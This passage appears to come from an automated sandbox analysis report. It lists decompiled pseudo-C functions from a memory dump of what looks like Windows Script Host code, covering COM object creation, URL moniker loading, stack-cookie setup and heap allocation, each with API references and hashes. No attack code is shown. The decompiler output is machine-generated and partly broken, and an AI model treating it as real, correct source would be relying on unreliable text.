                                                        • GetLastError.KERNEL32 ref: 00B8F147
                                                        • FindClose.KERNEL32(00000000), ref: 00B8F1BA
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorFileFindLast$AttributesByteCharCloseFirstMultiWide
                                                        • String ID:
                                                        • API String ID: 443336949-0
                                                        • Opcode ID: 25d47cd05b2a74338198b177857858e2f50a7b7564a0ab0f1342915b7200a749
                                                        • Instruction ID: 50daa0203b09e1d9a557f65ed83acedc131903cb451058f01f8b7f2f6b69bd57
                                                        • Opcode Fuzzy Hash: 25d47cd05b2a74338198b177857858e2f50a7b7564a0ab0f1342915b7200a749
                                                        • Instruction Fuzzy Hash: DE21677190111AEFDB217B69DC889BD76EDDB46774F600AE6F115E20B0CA348E85CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 72%
                                                        			E00B866C1(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                        				void* _v8;
                                                        				intOrPtr* _v12;
                                                        				void* _v16;
                                                        				void* _v20;
                                                        				void* _v24;
                                                        				void* _v28;
                                                        				void* _v32;
                                                        				void* _v36;
                                                        				void* _v40;
                                                        				char* _v44;
                                                        				char* _v48;
                                                        				char* _v52;
                                                        				char _v56;
                                                        				int _v64;
                                                        				char _v72;
                                                        				intOrPtr* _t84;
                                                        				short _t87;
                                                        				int _t88;
                                                        				intOrPtr* _t89;
                                                        				intOrPtr* _t91;
                                                        				intOrPtr* _t92;
                                                        				intOrPtr* _t93;
                                                        				intOrPtr* _t94;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr* _t96;
                                                        				intOrPtr* _t97;
                                                        				intOrPtr* _t98;
                                                        				intOrPtr* _t116;
                                                        				char* _t118;
                                                        				intOrPtr* _t119;
                                                        				intOrPtr _t121;
                                                        				intOrPtr* _t122;
                                                        				intOrPtr* _t124;
                                                        				intOrPtr* _t126;
                                                        				intOrPtr* _t128;
                                                        				intOrPtr* _t130;
                                                        				char* _t132;
                                                        				intOrPtr* _t133;
                                                        				intOrPtr* _t135;
                                                        				char* _t137;
                                                        				char* _t139;
                                                        				intOrPtr* _t140;
                                                        				intOrPtr _t142;
                                                        				intOrPtr _t162;
                                                        				signed int _t176;
                                                        				intOrPtr* _t181;
                                                        				intOrPtr* _t182;
                                                        				intOrPtr* _t183;
                                                        				char* _t184;
                                                        
                                                        				_t181 = __ecx + 0x25c;
                                                        				_t84 =  *_t181;
                                                        				_v12 = __ecx;
                                                        				_v8 = 0;
                                                        				_v20 = 0;
                                                        				_v28 = 0;
                                                        				_v36 = 0;
                                                        				_v40 = 0;
                                                        				_v32 = 0;
                                                        				_v24 = 0;
                                                        				_v16 = 0;
                                                        				if(_t84 != 0) {
                                                        					 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                        					 *_t181 = 0;
                                                        				}
                                                        				_t183 = __imp__CoCreateInstance;
                                                        				_push(_t181);
                                                        				_push(0xb869f0);
                                                        				_push(1);
                                                        				_push(0);
                                                        				_push(0xb869d0);
                                                        				if( *_t183() >= 0) {
                                                        					L3:
                                                        					_t87 = 3;
                                                        					_v72 = _t87;
                                                        					_t88 = GetUserDefaultLCID();
                                                        					_v64 = _t88;
                                                        					_t89 =  *_t181;
                                                        					_t184 =  *((intOrPtr*)( *_t89 + 0x1c))(_t89, 1, 0,  &_v72);
                                                        					if(_t184 >= 0) {
                                                        						_t184 = E00B86D41( &_v28,  *_t181,  &_v28);
                                                        						if(_t184 >= 0) {
                                                        							_t184 = E00B86EDC( &_v32, _v12,  *_t181,  &_v32);
                                                        							if(_t184 >= 0) {
                                                        								_t116 =  *_t181;
                                                        								_t184 =  *((intOrPtr*)( *_t116 + 0xc))(_t116, _v32);
                                                        								if(_t184 >= 0) {
                                                        									_t118 =  &_v36;
                                                        									__imp__CoGetClassObject(0xb869e0, 1, 0, 0xb86a20, _t118);
                                                        									_t184 = _t118;
                                                        									if(_t184 >= 0) {
                                                        										_t119 = _v36;
                                                        										_t184 =  *((intOrPtr*)( *_t119 + 0x14))(_t119, _v28, 0, 0xb86a00,  &_v8);
                                                        										if(_t184 >= 0) {
                                                        											_t121 = _v12;
                                                        											_t176 = 2;
                                                        											if( *((intOrPtr*)(_t121 + 0x23)) != 0) {
                                                        												_t176 = 0x22;
                                                        											}
                                                        											_t162 =  *((intOrPtr*)(_t121 + 0x28));
                                                        											if(_t162 != 0) {
                                                        												_t176 = _t176 | 0x00000040;
                                                        											}
                                                        											if(_t162 == 1) {
                                                        												if( *((intOrPtr*)(_t121 + 0x20)) != 0) {
                                                        													goto L12;
                                                        												} else {
                                                        													goto L13;
                                                        												}
                                                        												L60:
                                                        											} else {
                                                        												L12:
                                                        												_t176 = _t176 | 0x00000080;
                                                        											}
                                                        											L13:
                                                        											if( *((intOrPtr*)(_t121 + 0x26)) != 0) {
                                                        												_t176 = _t176 | 0x00000100;
                                                        											}
                                                        											if( *((intOrPtr*)(_t121 + 0x27)) != 0) {
                                                        												_t176 = _t176 | 0x00000200;
                                                        											}
                                                        											_t122 = _v8;
                                                        											_t184 =  *((intOrPtr*)( *_t122 + 0xc))(_t122, _t176);
                                                        											if(_t184 >= 0) {
                                                        												_t124 = _v8;
                                                        												_t184 =  *((intOrPtr*)( *_t124))(_t124, 0xb86a10,  &_v20);
                                                        												if(_t184 >= 0) {
                                                        													_t126 = _v20;
                                                        													_t184 =  *((intOrPtr*)( *_t126 + 0xc))(_t126, L"WScript", 2);
                                                        													if(_t184 >= 0) {
                                                        														_t128 = _v20;
                                                        														_t184 =  *((intOrPtr*)( *_t128 + 0xc))(_t128, L"WSH", 2);
                                                        														if(_t184 >= 0) {
                                                        															_t130 = _v8;
                                                        															_t184 =  *((intOrPtr*)( *_t130))(_t130, 0xb86a30,  &_v24);
                                                        															if(_t184 >= 0) {
                                                        																_t132 =  &_v16;
                                                        																__imp__CreateBindCtx(0, _t132);
                                                        																_t184 = _t132;
                                                        																if(_t184 >= 0) {
                                                        																	_t133 = _v16;
                                                        																	_v56 = 0x10;
                                                        																	_v52 = 0;
                                                        																	_v48 = 0;
                                                        																	_v44 = 0;
                                                        																	_t184 =  *((intOrPtr*)( *_t133 + 0x18))(_t133,  &_v56);
                                                        																	if(_t184 >= 0) {
                                                        																		_t135 = _v24;
                                                        																		_t184 =  *((intOrPtr*)( *_t135 + 0x14))(_t135, 1, _a4, _v16, 0);
                                                        																		if(_t184 < 0) {
                                                        																			if(_t184 != 0x80020101) {
                                                        																				_t137 = E00B8F362(_v12, 0x80070002);
                                                        																				goto L58;
                                                        																			}
                                                        																		} else {
                                                        																			_t138 = _v12;
                                                        																			if( *((intOrPtr*)(_v12 + 0x21)) != 0) {
                                                        																				_t139 = E00B8FC44( *((intOrPtr*)(_t138 + 0x24c)),  *((intOrPtr*)(_t138 + 8)));
                                                        																				_t184 = _t139;
                                                        																				if(_t184 >= 0) {
                                                        																					goto L25;
                                                        																				}
                                                        																			} else {
                                                        																				L25:
                                                        																				_t140 = _v8;
                                                        																				_t184 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, _a8,  *_t181, 0, 0xb815b8,  &_v40);
                                                        																				if(_t184 < 0) {
                                                        																					if(_t184 == 0x80070057) {
                                                        																						_t142 =  *0xb9702c; // 0x0
                                                        																						_t137 = E00B8F321(_v12, _t142 + 0x15, 0xcf7, _a8);
                                                        																						L58:
                                                        																						_t184 = _t137;
                                                        																					}
                                                        																				} else {
                                                        																					_t184 = 0;
                                                        																				}
                                                        																			}
                                                        																		}
                                                        																	}
                                                        																}
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        				} else {
                                                        					_t184 =  *_t183(0xb869c0, 0, 1, 0xb869f0, _t181);
                                                        					if(_t184 >= 0) {
                                                        						goto L3;
                                                        					}
                                                        				}
                                                        				_t91 = _v16;
                                                        				if(_t91 != 0) {
                                                        					 *((intOrPtr*)( *_t91 + 8))(_t91);
                                                        				}
                                                        				_t92 = _v24;
                                                        				if(_t92 != 0) {
                                                        					 *((intOrPtr*)( *_t92 + 8))(_t92);
                                                        				}
                                                        				_t93 = _v40;
                                                        				if(_t93 != 0) {
                                                        					 *((intOrPtr*)( *_t93 + 8))(_t93);
                                                        				}
                                                        				_t94 = _v8;
                                                        				if(_t94 != 0) {
                                                        					 *((intOrPtr*)( *_t94 + 8))(_t94);
                                                        				}
                                                        				_t95 = _v20;
                                                        				if(_t95 != 0) {
                                                        					 *((intOrPtr*)( *_t95 + 8))(_t95);
                                                        				}
                                                        				_t96 = _v28;
                                                        				if(_t96 != 0) {
                                                        					 *((intOrPtr*)( *_t96 + 8))(_t96);
                                                        				}
                                                        				_t97 = _v32;
                                                        				if(_t97 != 0) {
                                                        					 *((intOrPtr*)( *_t97 + 8))(_t97);
                                                        				}
                                                        				_t98 = _v36;
                                                        				if(_t98 != 0) {
                                                        					 *((intOrPtr*)( *_t98 + 8))(_t98);
                                                        				}
                                                        				_t182 = _v12;
                                                        				E00B85FA1( *((intOrPtr*)(_t182 + 0x24c)));
                                                        				if(E00B85BBF(_t182) != 0) {
                                                        					 *((intOrPtr*)( *_t182 + 0x20))();
                                                        				}
                                                        				return _t184;
                                                        				goto L60;
                                                        			}

                                                        APIs
                                                        • CoCreateInstance.OLE32(00B869D0,00000000,00000001,00B869F0,00B86E16), ref: 00B8670D
                                                        • CoCreateInstance.OLE32(00B869C0,00000000,00000001,00B869F0,00B86E16), ref: 00B86721
                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,?,00B86E16,00000000,?,00000000,?,00000000,00000000,.wsf,000000FF,?,0000002E,?), ref: 00B86734
                                                        • CoGetClassObject.OLE32(00B869E0,00000001,00000000,00B86A20,?), ref: 00B867A9
                                                        • CreateBindCtx.OLE32(00000000,?), ref: 00B86899
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Create$Instance$BindClassDefaultObjectUser
                                                        • String ID: WSH$WScript
                                                        • API String ID: 1420412123-1019903269
                                                        • Opcode ID: 6bc9bdfe75c48a84aa3a572da9332db39876910344849df3bde5e56f257ac7fd
                                                        • Instruction ID: 870e6a198bb47e9768d15f5da59e5070c9e43c86ba27b7683cad86451d08f014
                                                        • Opcode Fuzzy Hash: 6bc9bdfe75c48a84aa3a572da9332db39876910344849df3bde5e56f257ac7fd
                                                        • Instruction Fuzzy Hash: DCB14C75A00215EFCB10EFA4C8C8DADB7F9EB4C704B2545E9E946EB2A0D7369D41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E00B86E5C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                        				_Unknown_base(*)()* _t4;
                                                        				struct HINSTANCE__* _t6;
                                                        				signed int _t7;
                                                        
                                                        				_t4 =  *0xb9700c; // 0x0
                                                        				if(_t4 != 0) {
                                                        					L4:
                                                        					return  *_t4(_a4, _a8, _a12, 1);
                                                        				}
                                                        				_t6 =  *0xb97024; // 0x0
                                                        				if(_t6 != 0) {
                                                        					L3:
                                                        					_t4 = GetProcAddress(_t6, "CreateURLMonikerEx");
                                                        					 *0xb9700c = _t4;
                                                        					if(_t4 != 0) {
                                                        						goto L4;
                                                        					}
                                                        				} else {
                                                        					_t6 = LoadLibraryA("urlmon.dll");
                                                        					 *0xb97024 = _t6;
                                                        					if(_t6 != 0) {
                                                        						goto L3;
                                                        					}
                                                        				}
                                                        				 *0xb974a4 = 1;
                                                        				_t7 = GetLastError();
                                                        				if(_t7 > 0) {
                                                        					return _t7 & 0x0000ffff | 0x80070000;
                                                        				}
                                                        				return _t7;
                                                        			}

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00B86E78
                                                        • GetProcAddress.KERNEL32(00000000,CreateURLMonikerEx,?,00B86E4B,?,?,?,?,00B86DF9,00000000,?,00000000,00000000,.wsf,000000FF,?), ref: 00B86E91
                                                        • GetLastError.KERNEL32(?,00B86E4B,?,?,?,?,00B86DF9,00000000,?,00000000,00000000,.wsf,000000FF,?,0000002E,?), ref: 00B87E59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressErrorLastLibraryLoadProc
                                                        • String ID: CreateURLMonikerEx$urlmon.dll
                                                        • API String ID: 3511525774-3151727589
                                                        • Opcode ID: b042a76a75554185795a344c93309a790aa2efb955167a0df969004838ba91e3
                                                        • Instruction ID: c648c9e4fac47a4a18c1d3df5b61dd34db38089fedf7303a962dee4387ae7897
                                                        • Opcode Fuzzy Hash: b042a76a75554185795a344c93309a790aa2efb955167a0df969004838ba91e3
                                                        • Instruction Fuzzy Hash: 7FF06D396943069ADB11AF69DD04B663BDCFB14752B1040A5F900D7270EE75C840CB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B82FA1() {
                                                        				struct _FILETIME _v12;
                                                        				signed int _v16;
                                                        				union _LARGE_INTEGER _v20;
                                                        				signed int _t14;
                                                        				signed int _t16;
                                                        				signed int _t17;
                                                        				signed int _t18;
                                                        				signed int _t22;
                                                        				signed int _t23;
                                                        				signed int _t32;
                                                        
                                                        				_t14 =  *0xb97004; // 0xbb40e64e
                                                        				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                                        				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
                                                        				if(_t14 != 0xbb40e64e) {
                                                        					if((0xffff0000 & _t14) == 0) {
                                                        						goto L1;
                                                        					}
                                                        					_t23 =  !_t14;
                                                        					 *0xb97008 = _t23;
                                                        					return _t23;
                                                        				}
                                                        				L1:
                                                        				GetSystemTimeAsFileTime( &_v12);
                                                        				_t16 = GetCurrentProcessId();
                                                        				_t17 = GetCurrentThreadId();
                                                        				_t18 = GetTickCount();
                                                        				QueryPerformanceCounter( &_v20);
                                                        				_t22 = _v16 ^ _v20.LowPart;
                                                        				_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
                                                        				if(_t32 == 0xbb40e64e || ( *0xb97004 & 0xffff0000) == 0) {
                                                        					_t32 = 0xbb40e64f;
                                                        				}
                                                        				 *0xb97004 = _t32;
                                                        				 *0xb97008 =  !_t32;
                                                        				return _t22;
                                                        			}

                                                        APIs
                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B82FCF
                                                        • GetCurrentProcessId.KERNEL32 ref: 00B82FDB
                                                        • GetCurrentThreadId.KERNEL32 ref: 00B82FE3
                                                        • GetTickCount.KERNEL32 ref: 00B82FEB
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00B82FF7
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                        • String ID:
                                                        • API String ID: 1445889803-0
                                                        • Opcode ID: fddaf0bac5ca42cc85dbc3e3b77f42a56d56d83d176d9ea851804e56b6ffb8a8
                                                        • Instruction ID: 20f251ad3474310629f2cdf93b4c006784054260d9aee6dfe68d6e9445f0bb04
                                                        • Opcode Fuzzy Hash: fddaf0bac5ca42cc85dbc3e3b77f42a56d56d83d176d9ea851804e56b6ffb8a8
                                                        • Instruction Fuzzy Hash: 2E116572D012159BCB11ABF8DA8C6AAB7F8FB49755F550892E601F7220DE309D41C780
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 92%
                                                        			E00B81335(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                        				intOrPtr _v0;
                                                        				void* _v804;
                                                        				intOrPtr _v808;
                                                        				intOrPtr _v812;
                                                        				intOrPtr _t11;
                                                        				intOrPtr _t12;
                                                        				intOrPtr _t13;
                                                        				intOrPtr* _t26;
                                                        				void* _t29;
                                                        
                                                        				_t29 = __ecx -  *0xb97004; // 0xbb40e64e
                                                        				if(_t29 != 0) {
                                                        					 *0xb971d0 = __eax;
                                                        					 *0xb971cc = __ecx;
                                                        					 *0xb971c8 = __edx;
                                                        					 *0xb971c4 = __ebx;
                                                        					 *0xb971c0 = __esi;
                                                        					 *0xb971bc = __edi;
                                                        					 *0xb971e8 = ss;
                                                        					 *0xb971dc = cs;
                                                        					 *0xb971b8 = ds;
                                                        					 *0xb971b4 = es;
                                                        					 *0xb971b0 = fs;
                                                        					 *0xb971ac = gs;
                                                        					asm("pushfd");
                                                        					_pop( *0xb971e0);
                                                        					 *0xb971d4 =  *_t26;
                                                        					 *0xb971d8 = _v0;
                                                        					 *0xb971e4 =  &_a4;
                                                        					 *0xb97120 = 0x10001;
                                                        					_t11 =  *0xb971d8; // 0x0
                                                        					 *0xb970dc = _t11;
                                                        					 *0xb970d0 = 0xc0000409;
                                                        					 *0xb970d4 = 1;
                                                        					_t12 =  *0xb97004; // 0xbb40e64e
                                                        					_v812 = _t12;
                                                        					_t13 =  *0xb97008; // 0x44bf19b1
                                                        					_v808 = _t13;
                                                        					SetUnhandledExceptionFilter(0);
                                                        					UnhandledExceptionFilter(0xb8d188);
                                                        					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                        				} else {
                                                        					return __eax;
                                                        				}
                                                        			}













                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00B8D161
                                                        • UnhandledExceptionFilter.KERNEL32(00B8D188), ref: 00B8D16C
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00B8D177
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B8D17E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                        • String ID:
                                                        • API String ID: 3231755760-0
                                                        • Opcode ID: 6f24ee5d99d59a38bdb829e405d1239fafb52d73d5dc4c4f13e36c30aabeeb2a
                                                        • Instruction ID: 210d9d43d784e9b9f03ae3521fa810ccb4c5548f3fb741e9094f4756843f3a4d
                                                        • Opcode Fuzzy Hash: 6f24ee5d99d59a38bdb829e405d1239fafb52d73d5dc4c4f13e36c30aabeeb2a
                                                        • Instruction Fuzzy Hash: 61217EB49A93249FC741DF69EE49A447BE4FB09710B50449BE908A7370EF705981CF29
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 69%
                                                        			E00B91AA2(intOrPtr __edi, intOrPtr* _a8, intOrPtr* _a12, char* _a16, intOrPtr* _a20) {
                                                        				signed int _v8;
                                                        				char _v528;
                                                        				char _v544;
                                                        				void* _v548;
                                                        				void* _v552;
                                                        				void* _v556;
                                                        				intOrPtr* _v560;
                                                        				intOrPtr* _v564;
                                                        				char _v568;
                                                        				char _v572;
                                                        				void* __ebx;
                                                        				void* __esi;
                                                        				signed int _t58;
                                                        				intOrPtr* _t60;
                                                        				char* _t61;
                                                        				void* _t62;
                                                        				char* _t68;
                                                        				intOrPtr* _t69;
                                                        				intOrPtr* _t70;
                                                        				intOrPtr* _t77;
                                                        				intOrPtr* _t78;
                                                        				intOrPtr* _t90;
                                                        				intOrPtr* _t92;
                                                        				intOrPtr* _t94;
                                                        				intOrPtr* _t96;
                                                        				intOrPtr* _t98;
                                                        				intOrPtr* _t101;
                                                        				intOrPtr _t120;
                                                        				char* _t121;
                                                        				intOrPtr* _t123;
                                                        				intOrPtr _t124;
                                                        				signed int _t125;
                                                        
                                                        				_t120 = __edi;
                                                        				_t58 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t58 ^ _t125;
                                                        				_t101 = _a20;
                                                        				_t119 = _a16;
                                                        				_t60 = _a12;
                                                        				_t123 = _a8;
                                                        				_v560 = _t119;
                                                        				_v564 = _t101;
                                                        				if(_t101 != 0) {
                                                        					if(_t123 != 0 &&  *_t123 == 0) {
                                                        						_t123 = 0;
                                                        					}
                                                        					if(_t119 != 0 &&  *_t119 == 0) {
                                                        						_v560 = 0;
                                                        					}
                                                        					_push(_t120);
                                                        					if(_t60 == 0) {
                                                        						L19:
                                                        						if(_t123 != 0) {
                                                        							_t61 =  &_v548;
                                                        							_v548 = 0;
                                                        							__imp__CreateBindCtx(0, _t61);
                                                        							_t121 = _t61;
                                                        							if(_t121 >= 0) {
                                                        								_v552 = 0;
                                                        								_t62 = E00B93559(_t123, 0x3a);
                                                        								if(_t62 == 0 || (_t62 - _t123 & 0xfffffffe) == 2) {
                                                        									_t124 = E00B83B1E(_t119, _t123, 0x104,  &_v528,  &_v568);
                                                        									if(_t124 >= 0) {
                                                        										_t68 =  &_v528;
                                                        										__imp__MkParseDisplayName(_v548, _t68,  &_v572,  &_v552);
                                                        										goto L31;
                                                        									}
                                                        									_t69 = _v552;
                                                        									goto L35;
                                                        								} else {
                                                        									_t68 = E00B86E2B(0, _t123,  &_v552);
                                                        									L31:
                                                        									_t124 = _t68;
                                                        									_t69 = _v552;
                                                        									if(_t124 < 0) {
                                                        										L35:
                                                        										if(_t69 != 0) {
                                                        											 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                        										}
                                                        										_t70 = _v548;
                                                        										if(_t70 == 0) {
                                                        											goto L44;
                                                        										} else {
                                                        											goto L38;
                                                        										}
                                                        									}
                                                        									_t119 =  &_v556;
                                                        									_t124 =  *((intOrPtr*)( *_t69 + 0x20))(_t69, _v548, 0, 0xb81638,  &_v556);
                                                        									if(_t124 == 0x800c0005) {
                                                        										_t124 = 0x800401ea;
                                                        									}
                                                        									_t69 = _v552;
                                                        									if(_t124 >= 0) {
                                                        										_t119 =  &_v544;
                                                        										_t124 =  *((intOrPtr*)( *_t69 + 0xc))(_t69,  &_v544);
                                                        										_t77 = _v552;
                                                        										if(_t77 != 0) {
                                                        											 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                        										}
                                                        										_t78 = _v548;
                                                        										if(_t78 == 0) {
                                                        											goto L43;
                                                        										} else {
                                                        											goto L42;
                                                        										}
                                                        									} else {
                                                        										goto L35;
                                                        									}
                                                        								}
                                                        							}
                                                        							_t90 = _v548;
                                                        							if(_t90 == 0) {
                                                        								goto L24;
                                                        							}
                                                        							goto L23;
                                                        						}
                                                        						_t71 = 0x80070057;
                                                        						goto L49;
                                                        					} else {
                                                        						if( *_t60 == 0) {
                                                        							_t60 = 0;
                                                        						}
                                                        						if(_t60 == 0) {
                                                        							goto L19;
                                                        						} else {
                                                        							if(E00B82B81(_t60, _t119, _t60,  &_v544,  &_v548) < 0) {
                                                        								L49:
                                                        								_pop(_t120);
                                                        								L50:
                                                        								return E00B81335(_t71, 0, _v8 ^ _t125, _t119, _t120, _t124);
                                                        							}
                                                        							if(_t123 == 0) {
                                                        								L18:
                                                        								_t92 = _v548;
                                                        								_t119 =  &_v556;
                                                        								_t124 =  *((intOrPtr*)( *_t92))(_t92, 0xb81638,  &_v556);
                                                        								_t78 = _v548;
                                                        								L42:
                                                        								 *((intOrPtr*)( *_t78 + 8))(_t78);
                                                        								L43:
                                                        								if(_t124 >= 0) {
                                                        									if(_v560 == 0 || E00B91945(_v556,  &_v544, _v560) >= 0) {
                                                        										 *_v564 = _v556;
                                                        										_t71 = 0;
                                                        									} else {
                                                        										 *((intOrPtr*)( *_v556 + 8))();
                                                        										E00B8F55F(_t119, E00B8160C, L"WScript.CreateObject", 0xc1e, _v556);
                                                        										_t71 = 0x80020009;
                                                        									}
                                                        									goto L49;
                                                        								}
                                                        								L44:
                                                        								_t71 = _t124;
                                                        								goto L49;
                                                        							}
                                                        							_t94 = _v548;
                                                        							_t119 =  &_v552;
                                                        							_t121 =  *((intOrPtr*)( *_t94))(_t94, E00B91D60,  &_v552);
                                                        							if(_t121 >= 0) {
                                                        								_t96 = _v552;
                                                        								_t124 =  *((intOrPtr*)( *_t96 + 0x14))(_t96, _t123, 2);
                                                        								_t98 = _v552;
                                                        								 *((intOrPtr*)( *_t98 + 8))(_t98);
                                                        								if(_t124 >= 0) {
                                                        									goto L18;
                                                        								}
                                                        								_t70 = _v548;
                                                        								L38:
                                                        								 *((intOrPtr*)( *_t70 + 8))(_t70);
                                                        								goto L44;
                                                        							}
                                                        							_t90 = _v548;
                                                        							L23:
                                                        							 *((intOrPtr*)( *_t90 + 8))(_t90);
                                                        							L24:
                                                        							_t71 = _t121;
                                                        							goto L49;
                                                        						}
                                                        					}
                                                        				}
                                                        				_t71 = 0x80004003;
                                                        				goto L50;
                                                        			}




































                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: WScript.CreateObject
                                                        • API String ID: 0-1366894974
                                                        • Opcode ID: 2d5e8fd1952342a791778f9a3d464fb519ae27d746830720c2c600874494aef2
                                                        • Instruction ID: 49414662d1795c0773a6e929972ed0b47f940d63ce0f2bed879d1c7a8734a454
                                                        • Opcode Fuzzy Hash: 2d5e8fd1952342a791778f9a3d464fb519ae27d746830720c2c600874494aef2
                                                        • Instruction Fuzzy Hash: CA813275A4111AABCF20EFA8DCC8AA9B7F9EB48304F1449F9E506EB251D6309D81DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B818C4(void** __ecx, void* _a4) {
                                                        				void* _t5;
                                                        				void* _t8;
                                                        				void* _t11;
                                                        				void** _t20;
                                                        
                                                        				_t20 = __ecx;
                                                        				_t5 =  *__ecx;
                                                        				if(_t5 != 0) {
                                                        					HeapFree(GetProcessHeap(), 0, _t5);
                                                        				}
                                                        				_t8 = _a4;
                                                        				_t20[2] = _t8;
                                                        				_t11 = HeapAlloc(GetProcessHeap(), 0, _t8 + _t8);
                                                        				_t20[1] = _t20[1] & 0x00000000;
                                                        				 *_t20 = _t11;
                                                        				if(_t11 == 0) {
                                                        					return 0x8007000e;
                                                        				} else {
                                                        					 *_t11 = 0;
                                                        					return 0;
                                                        				}
                                                        			}

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B818E8
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B818EB
                                                        • GetProcessHeap.KERNEL32(00000000), ref: 00B8929C
                                                        • HeapFree.KERNEL32(00000000), ref: 00B8929F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 3808df90cf18bef96645af1d5f40e4d92ca70e3e9fe359c4ac521857d787e219
                                                        • Instruction ID: 6d64e01f3a601c7b34790808c90fb3401665000924ae38efec590b1662b0f76f
                                                        • Opcode Fuzzy Hash: 3808df90cf18bef96645af1d5f40e4d92ca70e3e9fe359c4ac521857d787e219
                                                        • Instruction Fuzzy Hash: CBF0B471605304ABD7206FAEDC09F2377DCDF90321F10486AF445C7160DA74D841CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 55%
                                                        			E00B9041E(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                        				signed int _v8;
                                                        				intOrPtr _v68;
                                                        				intOrPtr _v72;
                                                        				char _v80;
                                                        				void* _v84;
                                                        				void* _v88;
                                                        				char _v92;
                                                        				intOrPtr _v96;
                                                        				intOrPtr _v100;
                                                        				char _v104;
                                                        				char _v108;
                                                        				char _v112;
                                                        				char _v116;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t39;
                                                        				char* _t42;
                                                        				intOrPtr* _t43;
                                                        				intOrPtr* _t44;
                                                        				intOrPtr* _t49;
                                                        				intOrPtr _t50;
                                                        				intOrPtr _t52;
                                                        				intOrPtr* _t53;
                                                        				intOrPtr _t54;
                                                        				intOrPtr* _t55;
                                                        				intOrPtr _t56;
                                                        				intOrPtr* _t59;
                                                        				signed int _t72;
                                                        
                                                        				_t39 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t39 ^ _t72;
                                                        				_t59 = _a4;
                                                        				_v96 = _a8;
                                                        				_t42 =  &_v88;
                                                        				_v100 = __ecx;
                                                        				_v88 = 0;
                                                        				_v84 = 0;
                                                        				_v92 = 0;
                                                        				__imp__CreateBindCtx(0, _t42);
                                                        				_t71 = _t42;
                                                        				if(_t42 < 0) {
                                                        					L11:
                                                        					__imp__#6(_v92);
                                                        					_t43 = _v84;
                                                        					if(_t43 != 0) {
                                                        						 *((intOrPtr*)( *_t43 + 8))(_t43);
                                                        					}
                                                        					_t44 = _v88;
                                                        					if(_t44 != 0) {
                                                        						 *((intOrPtr*)( *_t44 + 8))(_t44);
                                                        					}
                                                        					return E00B81335(_t71, _t59, _v8 ^ _t72, _t69, 0, _t71);
                                                        				}
                                                        				_t49 = _v88;
                                                        				_t69 =  &_v116;
                                                        				_v116 = 0x10;
                                                        				_v112 = 0;
                                                        				_v108 = 0;
                                                        				_v104 = 0;
                                                        				_t50 =  *((intOrPtr*)( *_t49 + 0x18))(_t49,  &_v116);
                                                        				_t71 = _t50;
